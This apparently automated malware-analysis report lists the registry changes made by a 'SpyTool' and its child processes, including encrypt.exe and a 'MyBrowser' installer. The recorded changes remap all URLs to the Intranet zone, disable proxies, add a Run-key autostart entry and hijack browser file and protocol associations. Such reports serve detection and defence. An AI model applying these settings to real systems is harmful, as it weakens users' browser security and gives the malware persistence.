The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 FA 98 A6 6C 0F D6 03 DC 45 D6 D2 EE 72 EB 0E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsj20.tmp:1672 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 E6 23 BB 15 9D 1B 09 0E 4C E0 8D AA 63 BE 5E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process amisid.exe:1116 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 03 9E AA 4F 80 79 47 2A A7 6C 9D CD F2 FA CB"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process nsr4.tmp:1452 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 1B 37 42 CD 9F 16 CD 8F 55 3D 99 4F 9C EF D3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process upgmsd_re_005010095.exe:436 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010095"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "FD4FD473-DEBD-4323-A94A-CB4D29B34964"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 95 42 60 0D 25 50 75 AD 90 77 80 A2 BF 6C 3F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010095.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsr14.tmp:1568 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 36 09 38 F1 28 82 17 CF 9D 6F 6C 5D 38 45 79"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-cpm-crb-crr"
The process wmic.exe:1276 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 04 DF 28 2E D4 1D 45 7E A2 FE C4 D9 61 51 90"
The process nsm34.tmp:1108 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 8A 88 AB 31 AE EB B5 62 8E F3 47 67 9B 7D EE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsc18.tmp:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B FD 1D 4A 54 DB BA 2F 5B 53 5F 00 8E ED 37 93"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process encrypt.exe:1052 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 B1 1C 2D E5 AA 62 DC AD F6 A5 19 87 77 DF 35"
The process encrypt.exe:1484 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F FF 37 83 6C 8E EB 81 12 89 28 37 3A C5 72 CA"
The process encrypt.exe:1972 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 F2 75 49 44 65 F5 E1 1A 1D 7A FA B2 75 A7 32"
The process encrypt.exe:1512 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 11 48 A1 5F 02 A6 5F F1 06 51 9D D2 C4 E2 64"
The process tasklist.exe:1256 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 3C 4D A3 10 29 E3 3B 70 B3 42 E3 83 93 8C 15"
The process tasklist.exe:1536 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D B1 9F C4 AD 89 AE 6E 85 48 BF B8 13 80 8E F6"
The process setup.exe:2036 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150923"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc2B.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc2B.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
